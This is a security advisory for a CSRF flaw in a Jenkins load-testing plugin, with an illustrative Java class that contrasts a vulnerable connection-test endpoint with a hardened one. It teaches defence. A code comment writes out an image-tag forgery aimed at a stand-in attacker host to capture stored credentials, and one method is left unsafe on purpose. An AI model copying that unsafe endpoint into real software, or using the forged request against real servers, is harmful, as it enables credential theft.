PT-2023-21892 · Jenkins · Jenkins OctoPerf Load Testing Plugin

Yaroslav Afenkin · Published 2023-03-23 · Updated 2023-04-07

CVE-2023-28671

CVSS v3.1: 4.3 (Medium)
Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Name of the Vulnerable Software and Affected Versions: Jenkins OctoPerf Load Testing Plugin, versions 4.5.0 and earlier
Description: A cross-site request forgery (CSRF) vulnerability allows an attacker to make the Jenkins controller connect to an attacker-specified URL using attacker-specified credentials IDs, potentially capturing credentials stored in Jenkins. The root cause is that the plugin does not require POST requests for its connection test HTTP endpoint. Jenkins applies its CSRF crumb check only to POST requests, so an endpoint that also answers GET can be triggered by a request forged from a page that a logged-in Jenkins user is lured into visiting (hence PR:N and UI:R in the vector); the stored credentials are then sent to the URL the attacker chose.
Recommendations: For Jenkins OctoPerf Load Testing Plugin versions 4.5.0 and earlier, update to version 4.5.1 or later, which requires POST requests for the affected connection test HTTP endpoint. After upgrading, treat any OctoPerf credentials that may have been exposed as compromised and rotate them; the fix stops further leakage but does not undo a capture that already happened.
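The pattern behind this class of issue, shown as an added example that is not the plugin's own code: a Jenkins form-validation endpoint (a Stapler `do…` method on a `GlobalConfiguration`) in its vulnerable and hardened forms side by side. The class, method, field and parameter names (`ExampleLoadTestGlobalConfiguration`, `doTestConnectionUnsafe`, `doTestConnection`, `url`, `credentialsId`) are hypothetical; the Jenkins, Stapler and Credentials API calls are real. The hardened method uses `@RequirePOST`, the standard Jenkins mechanism for requiring POST on such endpoints, and adds the permission check that Jenkins plugin security guidance also expects on any endpoint that makes a server-side request with stored credentials.

```java
// Added example (not the OctoPerf plugin's code). Class, method and parameter
// names are hypothetical; only the Jenkins/Stapler/Credentials APIs are real.
package example.jenkins.hardening;

import com.cloudbees.plugins.credentials.CredentialsMatchers;
import com.cloudbees.plugins.credentials.CredentialsProvider;
import com.cloudbees.plugins.credentials.common.StandardUsernamePasswordCredentials;
import com.cloudbees.plugins.credentials.domains.DomainRequirement;
import hudson.Extension;
import hudson.security.ACL;
import hudson.util.FormValidation;
import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.Collections;
import jenkins.model.GlobalConfiguration;
import jenkins.model.Jenkins;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.interceptor.RequirePOST;

@Extension
public class ExampleLoadTestGlobalConfiguration extends GlobalConfiguration {

    // VULNERABLE PATTERN. Stapler exposes this at
    // <jenkins>/descriptorByName/<fully.qualified.ClassName>/testConnectionUnsafe
    // and accepts GET. Jenkins validates its CSRF crumb only on POST, so an
    // <img src="...?url=https://attacker.example&credentialsId=prod-octoperf">
    // on a page the victim visits runs this with the victim's session, and the
    // credentials selected by the attacker-chosen credentialsId are sent to the
    // attacker-chosen url. No permission check either: any logged-in user works.
    public FormValidation doTestConnectionUnsafe(@QueryParameter String url,
                                                 @QueryParameter String credentialsId) {
        return connect(url, credentialsId);
    }

    // HARDENED PATTERN. @RequirePOST makes Stapler reject any non-POST request,
    // which puts the endpoint behind the crumb check; checkPermission limits who
    // may make the controller connect anywhere with stored credentials at all.
    @RequirePOST
    public FormValidation doTestConnection(@QueryParameter String url,
                                           @QueryParameter String credentialsId) {
        Jenkins.get().checkPermission(Jenkins.ADMINISTER);
        return connect(url, credentialsId);
    }

    // Shared body: resolve the credentials ID and do the outbound test request.
    // This is exactly the step that leaks when the method above is reachable
    // cross-site, because the credentials travel to whatever `url` says.
    private FormValidation connect(String url, String credentialsId) {
        StandardUsernamePasswordCredentials creds = CredentialsMatchers.firstOrNull(
                CredentialsProvider.lookupCredentials(
                        StandardUsernamePasswordCredentials.class,
                        Jenkins.get(), ACL.SYSTEM,
                        Collections.<DomainRequirement>emptyList()),
                CredentialsMatchers.withId(credentialsId));
        if (creds == null) {
            return FormValidation.error("No credentials with ID " + credentialsId);
        }
        try {
            HttpURLConnection conn = (HttpURLConnection) new URL(url).openConnection();
            String basic = creds.getUsername() + ":" + creds.getPassword().getPlainText();
            conn.setRequestProperty("Authorization", "Basic "
                    + Base64.getEncoder().encodeToString(basic.getBytes(StandardCharsets.UTF_8)));
            conn.setConnectTimeout(5000);
            conn.setReadTimeout(5000);
            int status = conn.getResponseCode();
            return status == 200 ? FormValidation.ok("Connected")
                                 : FormValidation.error("Server answered HTTP " + status);
        } catch (IOException e) {
            return FormValidation.error(e, "Connection failed");
        }
    }
}
```

The Jelly side has to match: `<f:validateButton>` submits with POST by default, but a `checkUrl` on a text field is fetched with GET unless `checkMethod="post"` is set, so wiring a `@RequirePOST` endpoint that way makes validation fail safe rather than leak. When auditing a plugin for this class of bug, look for every `do*` method that resolves a credentials ID and makes an outbound request, and confirm it carries both `@RequirePOST` (or `@POST`) and a permission check.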

Fix available

Weakness Enumeration

CSRF (cross-site request forgery)

Related Identifiers

CVE-2023-28671
GHSA-WQ3W-3RXH-VCXX

Affected Products

Jenkins
Jenkins OctoPerf Load Testing Plugin